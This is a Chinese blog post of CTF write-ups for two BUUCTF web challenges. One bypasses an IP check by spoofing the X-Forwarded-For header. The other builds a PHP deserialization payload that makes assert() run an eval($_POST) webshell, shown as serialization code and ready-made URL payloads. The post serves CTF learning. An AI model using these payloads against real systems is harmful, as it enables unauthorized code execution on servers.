2021-02-14

最新推荐文章于 2023-01-17 21:10:31 发布
最新推荐文章于 2023-01-17 21:10:31 发布
阅读量155 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113811113
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[MRCTF2020] PYWebsite

考点:

X-Forwarded-For

启动环境:在这里插入图片描述
提示需要购买flag,查看网页源码时,发现:

<script>

    function enc(code){
      hash = hex_md5(code);
      return hash;
    }
    function validate(){
      var code = document.getElementById("vcode").value;
      if (code != ""){
        if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
          alert("您通过了验证!");
          window.location = "./flag.php"
        }else{
          alert("你的授权码不正确!");
        }
      }else{
        alert("请输入授权码");
      }
      
    }

  </script>

通过验证后将跳转到flag.php页面,访问flag.php页面:在这里插入图片描述
提示在后端验证了IP,还提示了需要购买者或自己IP,猜测可能是对X-Forward-For做了验证,使用BurpSuite抓取数据包:
在这里插入图片描述

在请求信息中添加:X-Forwarded-For: 127.0.0.1,发送数据包,得到flag:在这里插入图片描述

[NPUCTF2020]ReadlezPHP -wp

在这里插入图片描述查看一下源码,发现time.php?souce=在这里插入图片描述

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

一个反序列
观察下__destruct()魔术方法在这里插入图片描述
属性b包裹住属性a
刚好可以传个木马进去
利用assert()函数

assert() 断言函数
assert详细介绍

assert 判断一个表达式是否成立
assert()可以将整个字符串参数当作php参数执行。

所以构造木马

assert(eval($_POST[penson]);)

序列化一下

<?php
error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}

$test = new HelloPhp();
$test->b = 'assert';
$test->a = 'eval($_POST[penson]);';

echo urlencode(serialize($test));


?>

payload:
?data=O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A21%3A%22eval%28%24_POST%5Bpenson%5D%29%3B%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D

蚁剑连接啥都没有…
去看看phpinfo
还是没有啥过滤,直接搜flag (Ctrl+f查找flag即可)

最后发现
这里不用一句话木马,可以直接传参就好。。。

很明显$b($a)这里可供我们操作。
system好像被禁了,用assert()

简单查看到反序列化,构造序列化字符传入,用断言assert()函数来读phpinfo
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

无尽星河-深空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Serial-COM25_2021-04-04_14-37-43.log
04-04
Serial-COM25_2021-04-04_14-37-43.log
minio version RELEASE.2022-02-01T18-00-14Z (amd x64)
02-13
minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-...
CTF攻防世界web题解题思路XFF-REFERER
m0_63687631的博客
12-25 3043
1.打开网页 2.然抓个包改变下ip 3.用X-Forwarded-For改变ip,如图: 4.因为要重复使用所以要用repeater,然后发送 5. 然后是这样,点击render 6.最后输入referer 7.点render,可得到flag 知识点: 1.ip地址可以用,X-Forwarded-For改 2.referer是就是来源网站。 ...
BugkuCTF_WEB
DUOan0216的博客
08-31 322
***现在会的WEB题目就只是 F12 查源码 burp抓包 密码burp爆破 简单的GET POST 传参 漏洞之类的: 没有。。。。。。菜爆了 *** WEB2 emm F12得到结果 计算器 maxlength的问题 改一下长度就可以了 WEB基础$GET 看代码 在URL上输入?what=flag WEB基础$POST 观察代码 利用POST传参 burp上手 注意一下REQUEST me...
buuctf-web-[极客大挑战 2019]Http1
mlws1900的博客
01-17 200
修改X-Forwarded-For:localhost或者127.0.0.1。修改User-Agent为Syclover。看到Secret.php文件,打开查看。添加一个Referer头,内容为该网址。返回提示,说需要指定的浏览器访问。主页看不到什么东西,查看源代码。又提示只能从本地读取文件内容。用谷歌浏览器打开空无一物。
CTF-WEB总结(四-题目来源i春秋)
weixin_41038905的博客
05-07 5366
Web总结: 1.网页源代码查看 即使浏览器不设置 直接访问此链接也可以看到原代码,后来发现其他网页也是如此, 所以破解方法有三个 一个是直接F12查看元素可以看到 一个是设置浏览器关闭js 一个是直接在链接前加view-source    注意看原代码的链接:view-source:http://159.138.137.79:55803/ 2.直接在链接后加/robots.txt,这边记录了爬虫...
掘安杯原题复现-——flag到底在哪里
weixin_44866139的博客
04-13 2661
##掘安杯原题复现——flag在哪里 打开题目链接 点击flag在哪里,发现出现404notfound 查看网页源代码,发现没有提供有用信息 抓包试试,惊奇地发现flag,但并不是我们想要的 在线base64解密即可得到flag ...
2021-2022收藏的精品资料2021-2022年餐厅工作计划表.doc
09-16
1. **营业时间**:餐厅的营业时间设定为每天9:00至21:00,午休时间为14:00至02:00。这显示了餐厅的日常运营时间安排,考虑到了顾客的用餐习惯和员工的休息需求。 2. **菜单更新**:提到“ƽģ���� ������...
Toolint-tests-Empty-TC-Add-Tools-2021-04-12T14-00-43.589Z:为工具链创建
04-12
标题中的"Toolint-tests-Empty-TC-Add-Tools-2021-04-12T14-00-43.589Z:为工具链创建"表明这是一个关于工具链构建的测试项目,具体是在2021年4月12日的一个时间点进行的。这个项目可能涉及到了对某个工具集的添加和...
“百度杯”CTF比赛 十月场 Not Found
feng的博客
10-01 1838
前言 有一说一,这题还是挺阴间的。不过自己也是学习了新的姿势。 WP 进入之后提示404.php没有,然后扫一下目录发现1.php,访问也没有flag,再直接访问404.php是haha(出题人出来挨打)。之后进行一些尝试均已失败告终,去看了看WP。 首先就是直接访问网站的时候,响应头里有一个x-method是haha: 原来这是提示我们要换请求方式(出题人在哪????haha 什么呢????) HTTP请求就那几种方式,挨个试,在试到OPTIONS的时候出现了重定向: 点一下关注重定向: 发现请求变
2019掘安杯网络安全赛web题write up
qq_43741449的博客
04-10 1061
2019掘安杯网络安全赛web题write up(萌新) web1:link:http://120.79.1.69:10001/ 签到题,点开题目网址,再点开链接,跳转到404NOT FOUND页面,在跳转的过程中利用burp suite抓包得flag,再对flag进行base64解密,得最后flag,提交。 flag web2:link:http://120.79.1.69:10004/ 此题先...
CTF_论剑场(bugku新平台)部分题目write up
城南以南花亦开
03-31 2508
CTF_论剑场(bugku新平台) 部分题目write up(1)头像签到0和1的故事最简单的pwnweb26web1这个人真的很高web9Snake进制转换流量分析ezsypdf 头像 使用WinHex打开图片,尝试搜索关键字“flag”,发现flag; 按照题目要求,使用所到flag的md5 32位加密值进行验证,发现flag错误; 换个方式,将所到flag先进行base64解码,...
ctf练习之就差一把钥匙
SDM_JH的博客
08-06 1176
一、进入目标站点、查看源代码,没有什么发现 二、查看网站的robots.txt文件,发现存在/console路径 三、进入/console路径,查看源代码,没有发现 四、打开burp suite,设置代理,准备进行ip伪造 五、进行X-Forwarded-For伪造,发现408请求超时错误。 六、在试试X-Real-Ip伪造,同样是408错误。 七、试一下Client-Ip伪造,发现flag。 八、在多次尝试后发现,X-Forwarded-For伪造也可以获得flag。 九、那么为什么一开始使
CTF web 题型解题技巧-第一课 思路讲解
moRickyer的博客
11-26 4070
原定六月前学完的内容要延后了,先顾工作,后顾学习~对之前学习内容的总结:CTF web 题型解题技巧-第一课 思路讲解;之后会有关于CTF-WEB第二课、第三课等内容。 引用亮神的话: 如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。 ----Micropoor 侯亮大神说:知识的最高的境界是分享,而在我看来,我们在分享的同时也是对自我认知的一个提升。 image.png 以下内容大多是我在学习过程中,借鉴前人经
一天一道ctf 第23天(模板注入)
scrawman的博客
04-12 261
[BJDCTF2020]The mystery of ip 点击Flag会返回本机的IP地址,抓包看一下
PHP反序列化学习笔记
0xdawn的博客
04-17 975
0x00 前言 php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。 php序列化的函数为serialize。反序列化的函数为unserialize 0x01 序列化与反序列化 序列化 利用serialize()函数将一个对象转换为字符串形式 <?php c...
BUUCTF web-[HCTF 2018]WarmUp
m0_53314778的博客
01-14 3937
[HCTF 2018]WarmUp 点进去一个滑稽,,查看源码 有个php,访问php 查看源码,有个hint.php访问一下 提示说flag在ffffllllaaaagggg文件里,我们继续分析源码 我们发现最底部的if语句为执行条件,有三个条件,第一个判断文件不能为空(检查是否传了file参数),第二这个传的参数是字符串,第三要过白名单检测,过了之后包含 隐藏了flag的文件。我们再看上面的if语句,白名单是hint.php,又有mb_strpos和mb_substr截取内容,碰到?就截止,所以我们只
2021-01-27
m0_53314778的博客
01-27 1559
MRCTF2020]你传你马呢 .htaccess文件简介: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 打开apache的http.conf文件 到的AllowOverride None,将其改为AllowOverride
已知data = [ ('2021-01-01 08:00', 15), ('2021-01-01 12:00', 18), ('2021-01-01 16:00', 20), ('2021-01-02 08:00', 14), ('2021-01-02 12:00', 17), ('2021-01-02 16:00', 19) ]请写出代码对data实现指数平滑
最新发布
07-12
2021-01-02 08:00:00 14 16.125000 2021-01-02 12:00:00 17 16.562500 2021-01-02 16:00:00 19 17.781250 ``` 在上述代码中,我们使用`pd.DataFrame`将data转换为DataFrame,并将时间戳列设置为索引。然后,使用`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值